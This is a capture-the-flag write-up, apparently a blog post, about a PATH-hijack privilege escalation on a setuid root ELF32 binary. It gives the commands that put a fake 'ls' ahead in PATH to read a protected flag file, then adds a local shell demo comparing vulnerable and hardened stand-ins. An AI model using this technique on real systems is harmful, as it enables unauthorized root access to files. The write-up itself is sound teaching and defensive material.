Friday, May 6, 2016

Exploiting suid binary on ELF32 - System 1

Once logged in, I ran "ls -l" and found the binary "ch11" alongside its source code file. Notice that ch11 is setuid root, and that our user account has no permission to read the .passwd file, which holds the flag. Even without the source code file, running "strings" on the binary gives enough of a clue to solve this challenge without a debugger: the string "ls /challenge/app-script/ch11/.passwd" shows that the program runs "ls" by its bare name, with no absolute path, against the very .passwd file that contains the flag.

I execute the ch11 binary:

Since the binary is setuid root, every command it spawns inherits root's effective uid rather than ours. Because it names "ls" without a path, that command is looked up through the PATH environment variable, which we control, so whichever file called "ls" appears first in our PATH is what runs as root.

I copied /bin/cat to /tmp/ls, put /tmp at the front of PATH (for example, export PATH=/tmp:$PATH), and ran the ch11 binary again. This time "ls" resolves to /tmp/ls, which is really cat, so it prints the contents of the ".passwd" file: the flag!
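The same hijack, reproduced locally as an added example (this is not the challenge's code or the original post's commands): a scratch directory stands in for /challenge/app-script/ch11, a small script stands in for the vulnerable ch11, a second script shows the hardened form, and a wrapper named "ls" plays the role of /tmp/ls. All file names, the "flag{demo}" content and the stand-in scripts are constructed for this demo; no setuid bit is needed, because the setuid bit only decides which uid the hijacked "ls" runs as, not whether it gets picked up.

```shell
#!/bin/sh
# Added example, not the challenge's code: reproduce the PATH hijack against
# local stand-ins for ch11. Every path below is constructed for this demo.

demo_setup() {
  DEMO=$(mktemp -d)
  mkdir -p "$DEMO/target" "$DEMO/bin"
  printf 'flag{demo}\n' > "$DEMO/target/.passwd"

  # Record the real ls before we start tampering with PATH.
  REAL_LS=$(command -v ls)

  # Stand-in for the vulnerable ch11: runs "ls" by bare name, just like
  # a system("ls /challenge/app-script/ch11/.passwd") call would.
  cat > "$DEMO/ch11_vuln" <<EOF
#!/bin/sh
ls $DEMO/target/.passwd
EOF

  # Hardened stand-in: absolute path to ls and a PATH it sets itself, so
  # nothing inherited from the caller influences the lookup.
  cat > "$DEMO/ch11_fixed" <<EOF
#!/bin/sh
PATH=/usr/bin:/bin
export PATH
$REAL_LS $DEMO/target/.passwd
EOF

  # The hijack: a file named "ls" that actually behaves like cat. The
  # write-up copies /bin/cat; a wrapper is used here so the demo also works
  # where cat is a multi-call binary that picks its behaviour from argv[0].
  printf '#!/bin/sh\nexec cat "$@"\n' > "$DEMO/bin/ls"
  chmod +x "$DEMO/ch11_vuln" "$DEMO/ch11_fixed" "$DEMO/bin/ls"
}

# What the shell spawned by the target will pick for "ls" once our
# directory is first in PATH (the equivalent of /tmp in the write-up).
resolved_ls() {
  ( PATH="$DEMO/bin:$PATH"; command -v ls )
}

# Run a stand-in ($1 = vuln or fixed) with the hijacked PATH exported.
run_hijacked() {
  ( PATH="$DEMO/bin:$PATH"; export PATH; "$DEMO/ch11_$1" )
}

demo_cleanup() {
  rm -rf "$DEMO"
}

demo_setup
echo "sh resolves ls to:          $(resolved_ls)"
echo "vulnerable stand-in prints: $(run_hijacked vuln)"
echo "hardened stand-in prints:   $(run_hijacked fixed)"
demo_cleanup
```

The vulnerable stand-in prints the flag because the shell it spawns resolves "ls" to our wrapper; the hardened one prints only the file name, because it never consults the inherited PATH. For a real setuid C program the equivalent fix is to stop calling system() with a bare command name and instead execve() an absolute path with a fixed environment, or better, not to spawn a shell at all. One caveat when trying this on other targets: bash drops an effective uid that differs from the real uid at startup unless it is run with -p, whereas dash does not, so whether a setuid binary's system() call keeps root depends on which shell /bin/sh is.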